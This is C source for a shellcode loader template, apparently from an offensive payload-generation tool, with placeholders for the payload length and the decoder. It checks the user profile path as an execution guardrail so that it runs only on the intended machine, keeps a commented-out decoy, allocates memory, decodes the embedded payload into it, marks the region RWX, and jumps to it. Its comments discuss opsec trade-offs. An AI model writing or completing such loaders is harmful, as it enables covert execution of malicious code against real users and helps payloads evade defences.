#include #include char *supermega_payload; #define p_RW 0x04 #define p_RX 0x20 #define p_RWX 0x40 /* iat_reuse Standard IAT reuse shellcode * create new memory region for the payload * will set it to RWX (safe to run shellcodes, opsec-unsafe) */ int main() { // Execution Guardrail: Env Check wchar_t envVarName[] = L"USERPROFILE"; wchar_t tocheck[] = L"C:\\Users\\hacker"; WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency! DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024); if (result == 0) { return 6; } if (mystrcmp(buffer, tocheck) != 0) { return 6; } // Decoy //WinExec("C:\\windows\\system32\\notepad.exe", 1); // Allocate 1 // char *dest = ... char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, p_RW); // Wait a bit //sleep_ms(2000); // Copy (and decode) // from: supermega_payload[] // to: dest[] {{ plugin_decoder }} if (VirtualProtect(dest, {{PAYLOAD_LEN}}, p_RWX, &result) == 0) { return 7; } // Execute *dest (*(void(*)())(dest))(); return 0; } int mystrcmp(wchar_t* str1, wchar_t* str2) { int i = 0; while (str1[i] != L'\0' && str2[i] != L'\0') { if (str1[i] != str2[i]) { return 1; } i++; } return 0; }